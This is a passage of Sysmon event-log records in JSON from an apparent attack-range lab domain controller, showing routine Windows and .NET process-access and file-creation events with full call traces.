indows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7724,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:51.512\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:51.512","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7725,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:51.512\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:51.512","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7726,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:51.512\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:51.512","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7727,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:51.512\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-00103F1E0500}\r\nSourceProcessId: 2768\r\nSourceThreadId: 2656\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-04B9-5F25-0000-00105D3A1000}\r\nTargetProcessId: 1540\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:51.512","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-00103F1E0500}","SourceProcessId":"2768","SourceThreadId":"2656","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-04B9-5F25-0000-00105D3A1000}","TargetProcessId":"1540","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7728,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:51.621\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3800\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-04D7-5F25-0000-001047701100}\r\nTargetProcessId: 4960\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:51.621","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3800","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-04D7-5F25-0000-001047701100}","TargetProcessId":"4960","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7729,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:51.621\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04D7-5F25-0000-001047701100}\r\nTargetProcessId: 4960\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:51.621","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04D7-5F25-0000-001047701100}","TargetProcessId":"4960","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:59:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7730,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:51.621\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04D7-5F25-0000-001047701100}\r\nTargetProcessId: 4960\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:51.621","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04D7-5F25-0000-001047701100}","TargetProcessId":"4960","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:52","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7731,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:59:52.809\r\nProcessGuid: {A837DB8D-04D7-5F25-0000-001047701100}\r\nProcessId: 4960\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1360-0\\System.ServiceModel.Web.dll\r\nCreationUtcTime: 2020-08-01 05:59:52.809","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:59:52.809","ProcessGuid":"{A837DB8D-04D7-5F25-0000-001047701100}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1360-0\\System.ServiceModel.Web.dll","CreationUtcTime":"2020-08-01 05:59:52.809","EventReceivedTime":"2020-08-01 05:59:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:52","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7732,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:52.856\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-04D8-5F25-0000-0010BA781100}\r\nTargetProcessId: 4360\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:52.856","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-04D8-5F25-0000-0010BA781100}","TargetProcessId":"4360","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dl